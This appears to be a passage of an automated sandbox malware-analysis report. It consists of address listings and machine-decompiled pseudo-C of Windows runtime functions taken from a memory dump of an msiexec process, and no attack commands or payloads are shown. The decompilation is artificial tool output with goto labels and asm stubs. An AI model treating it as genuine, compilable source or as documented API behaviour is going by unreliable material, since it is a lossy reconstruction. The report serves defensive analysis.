                              0x04d32829
                              0x04d32831
                              0x04d3283c
                              0x04d3283e
                              0x00000000
                              0x04d3283e
                              0x00000000
                              0x00000000
                              0x04d3284e
                              0x04d32850
                              0x04d32851
                              0x04d32854
                              0x04d32857
                              0x04d3285a
                              0x04d3285c
                              0x04d3285d
                              0x00000000
                              0x00000000
                              0x04d3275d
                              0x04d32761
                              0x00000000
                              0x04d32767
                              0x04d3276e
                              0x04d32773
                              0x04d32773
                              0x04d32776
                              0x04d32778
                              0x04d3277e
                              0x04d3277e
                              0x04d32781
                              0x04d32781
                              0x04d32783
                              0x04d32784
                              0x00000000
                              0x00000000
                              0x04d75bd8
                              0x04d75bde
                              0x04d75be4
                              0x04d75be6
                              0x04d75be8
                              0x04d75be9
                              0x04d75bee
                              0x04d75bf8
                              0x04d75bff
                              0x04d75c01
                              0x04d75c04
                              0x04d75c07
                              0x04d75c0b
                              0x04d75c0d
                              0x04d75c0d
                              0x04d75c15
                              0x04d75c18
                              0x04d75c1b
                              0x04d75c1b
                              0x04d75c1e
                              0x00000000
                              0x00000000
                              0x04d328c3
                              0x04d328c8
                              0x04d328d2
                              0x04d328d4
                              0x04d328d8
                              0x04d328db
                              0x04d75c26
                              0x04d75c28
                              0x04d75c2d
                              0x04d75c2d
                              0x00000000
                              0x00000000
                              0x04d75c34
                              0x04d75c36
                              0x04d75c49
                              0x04d75c4e
                              0x04d75c54
                              0x04d75c5b
                              0x04d75c5d
                              0x04d75c60
                              0x04d32788
                              0x04d32788
                              0x04d3278b
                              0x04d3278e
                              0x04d3278e
                              0x04d3278e
                              0x04d32791
                              0x00000000
                              0x00000000
                              0x04d32756
                              0x04d32750
                              0x00000000
                              0x04d32794
                              0x04d32794
                              0x04d32795
                              0x04d32798
                              0x04d32798
                              0x00000000
                              0x04d32734
                              0x04d3272c
                              0x04d32700
                              0x04d325ef
                              0x04d325ef
                              0x04d325ef
                              0x04d325f2
                              0x04d325f8
                              0x00000000
                              0x00000000
                              0x04d325fe
                              0x00000000
                              0x04d328e6
                              0x04d328ec
                              0x04d328ef
                              0x04d328f5
                              0x04d328f8
                              0x04d328f8
                              0x00000000
                              0x04d328f8
                              0x00000000
                              0x00000000
                              0x04d32866
                              0x04d32866
                              0x04d32876
                              0x04d32879
                              0x00000000
                              0x00000000
                              0x04d327e0
                              0x04d327e7
                              0x04d327e9
                              0x04d327eb
                              0x04d75afd
                              0x00000000
                              0x04d75afd
                              0x00000000
                              0x00000000
                              0x04d32633
                              0x04d32638
                              0x04d3263b
                              0x04d3263c
                              0x04d3263e
                              0x04d32640
                              0x04d32642
                              0x04d32647
                              0x04d32649
                              0x04d3264e
                              0x04d32650
                              0x04d32653
                              0x04d32659
                              0x04d326a2
                              0x04d326a7
                              0x04d326ac
                              0x04d326b2
                              0x04d75b11
                              0x04d75b15
                              0x04d75b17
                              0x00000000
                              0x04d326b8
                              0x04d326b8
                              0x04d326ba
                              0x04d327a6
                              0x04d327a6
                              0x04d327a9
                              0x04d327ab
                              0x04d327b9
                              0x04d327b9
                              0x04d327be
                              0x04d327c1
                              0x04d327c3
                              0x04d327c5
                              0x04d327c7
                              0x04d75c74
                              0x04d75c79
                              0x04d75c79
                              0x04d327c7
                              0x00000000
                              0x04d326c0
                              0x04d326c0
                              0x04d326c3
                              0x04d326c6
                              0x04d326c6
                              0x04d326c9
                              0x04d326c9
                              0x00000000
                              0x04d326c9
                              0x04d326ba
                              0x04d3265b
                              0x04d3265b
                              0x04d3265e
                              0x04d32667
                              0x04d3266d
                              0x04d32677
                              0x04d3267c
                              0x04d3267f
                              0x04d32681
                              0x04d75b49
                              0x04d75b4e
                              0x04d327cd
                              0x04d327d0
                              0x04d327d1
                              0x04d327d2
                              0x04d327d4
                              0x04d327dd
                              0x04d32687
                              0x04d32687
                              0x04d3268a
                              0x04d3268b
                              0x04d3268e
                              0x04d3268f
                              0x04d32691
                              0x04d32696
                              0x04d32698
                              0x04d3269d
                              0x04d3269f
                              0x00000000
                              0x04d3269f
                              0x04d32681
                              0x00000000
                              0x00000000
                              0x04d32846
                              0x00000000
                              0x00000000
                              0x04d32605
                              0x04d3260a
                              0x04d3260c
                              0x04d32611
                              0x04d32616
                              0x04d32619
                              0x04d32619
                              0x04d3261e
                              0x00000000
                              0x04d32624
                              0x04d32627
                              0x04d32627
                              0x00000000
                              0x00000000
                              0x04d75b1f
                              0x00000000
                              0x00000000
                              0x04d32894
                              0x04d3289b
                              0x04d3289d
                              0x04d328a1
                              0x04d75b2b
                              0x04d75b2e
                              0x04d75b2e
                              0x04d328a7
                              0x04d328a9
                              0x04d75b04
                              0x04d75b09
                              0x04d75b09
                              0x04d75b09
                              0x00000000
                              0x00000000
                              0x04d75b35
                              0x04d75b3c
                              0x04d328fb
                              0x04d328fb
                              0x04d326cc
                              0x04d326cc
                              0x04d326d0
                              0x00000000
                              0x04d326d2
                              0x04d326d2
                              0x00000000
                              0x04d326d2
                              0x00000000
                              0x00000000
                              0x04d325fe
                              0x04d3292d
                              0x04d32930
                              0x04d32935
                              0x04d32937
                              0x04d3293e
                              0x04d3293f
                              0x04d32942
                              0x04d3294a
                              0x04d3294f
                              0x04d32957
                              0x04d32962
                              0x04d32963
                              0x04d3296e
                              0x04d3296f
                              0x04d32972
                              0x04d32973
                              0x04d32976
                              0x04d3297a
                              0x04d3297b
                              0x04d3297e
                              0x04d3297f
                              0x04d32980
                              0x04d32981
                              0x04d32982
                              0x04d32983
                              0x04d32984
                              0x04d32985
                              0x04d32986
                              0x04d32987
                              0x04d32988
                              0x04d32989
                              0x04d3298a
                              0x04d3298b
                              0x04d3298c
                              0x04d3298d
                              0x04d3298e
                              0x04d3298f
                              0x04d32990
                              0x04d32992
                              0x04d32997
                              0x04d329a3
                              0x04d329a6
                              0x04d329ab
                              0x04d329ad
                              0x04d329b0
                              0x04d329b2
                              0x04d75c80
                              0x04d329b8
                              0x04d329b8
                              0x04d329bb
                              0x04d329c0
                              0x04d329c5
                              0x04d329c6
                              0x04d329c6
                              0x04d329c9
                              0x04d329cb
                              0x00000000
                              0x00000000
                              0x04d329cd
                              0x04d329d0
                              0x04d329d9
                              0x04d329db
                              0x04d329dd
                              0x04d32a7f
                              0x04d32a84
                              0x04d32a87
                              0x04d32a89
                              0x04d75ca1
                              0x04d75ca3
                              0x00000000
                              0x04d32a8f
                              0x04d32a8f
                              0x00000000
                              0x04d32a8f
                              0x00000000
                              0x04d329e3
                              0x04d329e3
                              0x04d329e3
                              0x00000000
                              0x04d329e3
                              0x04d329dd
                              0x00000000
                              0x04d329db
                              0x04d329e6
                              0x04d329e9
                              0x04d329eb
                              0x04d329ed
                              0x04d329f3
                              0x04d329f5
                              0x04d329f8
                              0x04d329fa
                              0x04d32a97
                              0x04d32a9a
                              0x04d32a9d
                              0x04d32add
                              0x00000000
                              0x04d32a9f
                              0x04d32aa2
                              0x04d32aa5
                              0x04d32aa8
                              0x04d32aab
                              0x04d75cab
                              0x04d75caf
                              0x04d75cc5
                              0x04d75cda
                              0x04d75cdc
                              0x04d75cdf
                              0x04d75ce5
                              0x00000000
                              0x04d75ceb
                              0x04d75ced
                              0x04d75cee
                              0x00000000
                              0x04d75cee
                              0x04d75cb1
                              0x04d75cb4
                              0x04d75cb9
                              0x04d75cbb
                              0x00000000
                              0x04d75cbd
                              0x04d75cbd
                              0x00000000
                              0x04d75cbd
                              0x04d75cbb
                              0x04d32ab1
                              0x04d32ab1
                              0x04d32ac4
                              0x04d32ac6
                              0x04d32ac6
                              0x00000000
                              0x04d32ac6
                              0x04d32aab
                              0x00000000
                              0x04d32a00
                              0x04d32a09
                              0x04d32a0e
                              0x04d32a21
                              0x04d32a24
                              0x04d32a35
                              0x04d32a3a
                              0x04d32a3d
                              0x04d32a42
                              0x04d32a59
                              0x04d32a59
                              0x04d32a5c
                              0x04d32a5f
                              0x04d32a5f
                              0x04d329fa
                              0x04d329f3
                              0x04d32a64
                              0x04d32a64
                              0x04d32a6b
                              0x04d32a6b
                              0x04d32a6d
                              0x04d32a72
                              0x04d32a72
                              0x00000000

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: PATH
                              • API String ID: 0-1036084923
                              • Opcode ID: 5df4afaf8786379e5fa654e2fc361f7e9dbaef4134e44013bc0413a316b81e13
                              • Instruction ID: 8176260b5e87e78164e4213a55562e6f94a7299f204b1364143e3cbd026ebba6
                              • Opcode Fuzzy Hash: 5df4afaf8786379e5fa654e2fc361f7e9dbaef4134e44013bc0413a316b81e13
                              • Instruction Fuzzy Hash: 12C17CB1E00219EBDB25DFA8D891BBEB7B1FF48705F044069E941AB350E734B941DBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D3FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                              Download Yara Rule
                              C-Code - Quality: 80%
                              			E04D3FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E04D1EEF0(0x4df7b60);
					_t134 =  *0x4df7b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4df7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4df7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04D16D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E04D176E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04DA8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E04D0B150();
													}
													_t116 = E04DA6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E04D175CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x4df8638; // 0x305dc18
																	_t122 = L04D138A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E04D176E2(_t154);
																			goto L41;
																		}
																	} else {
																		E04D176E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L04D3FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L04D170F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E04D3FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E04D3FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E04D3FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E04D3FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E04D3FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4df7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4df7b84 = _t75;
						_t73 = E04D1EB70(_t134, 0x4df7b60);
						if( *0x4df7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E04D1FF60( *0x4df7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                              0x04d3fab0
                              0x04d3fab2
                              0x04d3fab3
                              0x04d3fab4
                              0x04d3fabc
                              0x04d3fac0
                              0x04d3fb14
                              0x04d3fb17
                              0x04d3fac2
                              0x04d3fac8
                              0x04d3facd
                              0x04d3fad3
                              0x04d3fad3
                              0x04d3fadd
                              0x04d3fb18
                              0x04d3fb1b
                              0x04d3fb1d
                              0x04d3fb1e
                              0x04d3fb1f
                              0x04d3fb20
                              0x04d3fb21
                              0x04d3fb22
                              0x04d3fb23
                              0x04d3fb24
                              0x04d3fb25
                              0x04d3fb26
                              0x04d3fb27
                              0x04d3fb28
                              0x04d3fb29
                              0x04d3fb2a
                              0x04d3fb2b
                              0x04d3fb2c
                              0x04d3fb2d
                              0x04d3fb2e
                              0x04d3fb2f
                              0x04d3fb3a
                              0x04d3fb3b
                              0x04d3fb3e
                              0x04d3fb41
                              0x04d3fb44
                              0x04d3fb47
                              0x04d3fb4a
                              0x04d3fb4d
                              0x04d3fb53
                              0x04d7bdcb
                              0x04d7bdcb
                              0x04d3fb59
                              0x04d3fb5b
                              0x04d3fb5b
                              0x04d3fb5e
                              0x04d7bdd5
                              0x04d7bdd8
                              0x00000000
                              0x04d7bdda
                              0x00000000
                              0x04d7bdda
                              0x04d3fb64
                              0x04d3fb64
                              0x04d3fb64
                              0x04d3fb67
                              0x04d3fb6e
                              0x04d3fb70
                              0x04d3fb72
                              0x00000000
                              0x04d3fb78
                              0x04d3fb7a
                              0x04d3fb7a
                              0x04d3fb7d
                              0x04d3fb80
                              0x04d7bddf
                              0x04d7bde1
                              0x00000000
                              0x04d7bde3
                              0x00000000
                              0x04d7bde3
                              0x04d3fb86
                              0x04d3fb86
                              0x04d3fb86
                              0x04d3fb8b
                              0x04d3fb90
                              0x04d3fb92
                              0x04d3fb94
                              0x04d3fb9a
                              0x04d3fb9b
                              0x04d3fba1
                              0x04d7bde8
                              0x04d7bdeb
                              0x04d7bded
                              0x04d7beb5
                              0x04d7beb5
                              0x04d7bebb
                              0x04d7bebd
                              0x04d7bec3
                              0x04d7bed2
                              0x04d7bedd
                              0x04d7bedd
                              0x04d7beed
                              0x00000000
                              0x04d7bdf3
                              0x04d7bdfe
                              0x04d7be06
                              0x04d7be0b
                              0x04d7be0d
                              0x04d7be0f
                              0x04d7be14
                              0x04d7be19
                              0x04d7be20
                              0x04d7be25
                              0x04d7be27
                              0x04d7be35
                              0x04d7be39
                              0x04d7be46
                              0x04d7be4f
                              0x04d7be54
                              0x04d7be56
                              0x04d7bef8
                              0x04d7bef8
                              0x00000000
                              0x04d7be5c
                              0x04d7be5c
                              0x04d7be60
                              0x00000000
                              0x04d7be66
                              0x04d7be66
                              0x04d7be7f
                              0x04d7be84
                              0x04d7be87
                              0x04d7be89
                              0x04d7be8b
                              0x04d7be99
                              0x04d7be9d
                              0x04d7bea0
                              0x04d7beac
                              0x04d7beaf
                              0x04d7beb1
                              0x04d7beb3
                              0x04d7beb3
                              0x00000000
                              0x04d7bea2
                              0x04d7bea2
                              0x00000000
                              0x04d7bea2
                              0x04d7be8d
                              0x04d7be8d
                              0x04d7be92
                              0x00000000
                              0x04d7be92
                              0x04d7be8b
                              0x04d7be60
                              0x04d7be3b
                              0x04d7be3b
                              0x04d7be3e
                              0x00000000
                              0x04d7be40
                              0x04d7be40
                              0x04d7be44
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d7be44
                              0x04d7be3e
                              0x04d7be29
                              0x04d7be29
                              0x00000000
                              0x04d7be29
                              0x04d7be27
                              0x00000000
                              0x04d3fba7
                              0x04d3fba7
                              0x04d3fbab
                              0x04d7bf02
                              0x04d3fbb1
                              0x04d3fbb1
                              0x04d3fbb8
                              0x04d3fbbd
                              0x04d3fbbd
                              0x04d3fbbf
                              0x04d3fbbf
                              0x04d3fbc5
                              0x04d3fbcb
                              0x04d3fbf8
                              0x04d3fbf8
                              0x04d3fbfa
                              0x00000000
                              0x04d3fc00
                              0x04d3fc00
                              0x04d3fc03
                              0x00000000
                              0x04d3fc09
                              0x04d3fc09
                              0x04d3fc0f
                              0x04d3fc15
                              0x04d3fc23
                              0x04d3fc23
                              0x04d3fc25
                              0x04d3fc27
                              0x04d3fc75
                              0x04d3fc7c
                              0x04d3fc84
                              0x00000000
                              0x04d3fc29
                              0x04d3fc29
                              0x04d3fc2d
                              0x04d3fc30
                              0x04d7bf0f
                              0x00000000
                              0x04d3fc36
                              0x04d3fc38
                              0x04d3fc3b
                              0x04d3fc41
                              0x04d7bf17
                              0x04d7bf19
                              0x04d7bf48
                              0x04d7bf4b
                              0x00000000
                              0x04d7bf1b
                              0x04d7bf22
                              0x04d7bf24
                              0x04d7bf26
                              0x00000000
                              0x04d7bf2c
                              0x04d7bf37
                              0x04d7bf39
                              0x04d7bf3b
                              0x00000000
                              0x04d7bf41
                              0x04d7bf41
                              0x04d7bf41
                              0x04d7bf41
                              0x04d7bf45
                              0x00000000
                              0x04d7bf45
                              0x04d7bf3b
                              0x04d7bf26
                              0x00000000
                              0x04d3fc47
                              0x04d3fc47
                              0x04d3fc49
                              0x04d3fcb2
                              0x04d3fcb4
                              0x04d3fcb6
                              0x04d3fcdc
                              0x04d3fcdc
                              0x00000000
                              0x04d3fcb8
                              0x04d3fcc3
                              0x04d3fcc5
                              0x04d3fcc7
                              0x00000000
                              0x04d3fcc9
                              0x04d3fcc9
                              0x04d3fccd
                              0x00000000
                              0x04d3fccd
                              0x04d3fcc7
                              0x00000000
                              0x04d3fc4b
                              0x04d3fc4b
                              0x04d3fc4e
                              0x04d3fc4e
                              0x04d3fc51
                              0x04d3fc51
                              0x04d3fc54
                              0x04d3fc5a
                              0x04d3fc5c
                              0x04d3fc5f
                              0x04d3fc61
                              0x04d3fc63
                              0x04d3fc65
                              0x04d3fc67
                              0x04d3fc6e
                              0x04d3fc72
                              0x04d3fc72
                              0x04d3fc72
                              0x04d3fc72
                              0x04d3fc67
                              0x04d3fc61
                              0x00000000
                              0x04d3fc5a
                              0x04d3fc49
                              0x04d3fc41
                              0x04d3fc30
                              0x04d3fc27
                              0x04d3fc03
                              0x04d3fbcd
                              0x04d3fbd3
                              0x04d3fbd9
                              0x04d3fbdc
                              0x04d3fbde
                              0x04d3fc99
                              0x04d3fc9b
                              0x04d3fc9d
                              0x04d3fcd5
                              0x04d3fcd5
                              0x04d3fc89
                              0x04d3fc89
                              0x00000000
                              0x04d3fc9f
                              0x04d3fc9f
                              0x04d3fca3
                              0x00000000
                              0x04d3fca3
                              0x00000000
                              0x04d3fbe4
                              0x04d3fbe4
                              0x04d3fbe4
                              0x04d3fbe4
                              0x04d3fbe9
                              0x04d3fbf2
                              0x00000000
                              0x04d3fbf2
                              0x04d3fbde
                              0x04d3fbcb
                              0x04d3fbab
                              0x04d3fc8b
                              0x04d3fc8b
                              0x04d3fc8c
                              0x04d3fb80
                              0x04d3fb72
                              0x04d3fb5e
                              0x04d3fc8d
                              0x04d3fc91
                              0x04d3fadf
                              0x04d3fadf
                              0x04d3fae1
                              0x04d3fae4
                              0x04d3fae7
                              0x04d3faec
                              0x04d3faf8
                              0x04d3fb00
                              0x04d3fb07
                              0x04d3fb0f
                              0x04d3fb0f
                              0x04d3fb07
                              0x00000000
                              0x04d3faf8
                              0x04d3fadd

                              Strings
                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04D7BE0F
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                              • API String ID: 0-865735534
                              • Opcode ID: 852cb29dcff2db228710cd25339d9e7659be74dcc36c28e4654909830709814b
                              • Instruction ID: 2e937c198037dd7fe8dd8f03881e2e5c3dcb88aa8c8e87fee31eecbc09897165
                              • Opcode Fuzzy Hash: 852cb29dcff2db228710cd25339d9e7659be74dcc36c28e4654909830709814b
                              • Instruction Fuzzy Hash: 22A1D171F006099FEB25DF64C494BBAB3A5FB44B19F04456EE8469B790EB34F841CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D02D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                              Download Yara Rule
                              C-Code - Quality: 63%
                              			E04D02D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4df5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4df7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E04D497C0();
				}
				if( *0x4df79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x4df79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04D31624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04D27D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E04D9FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
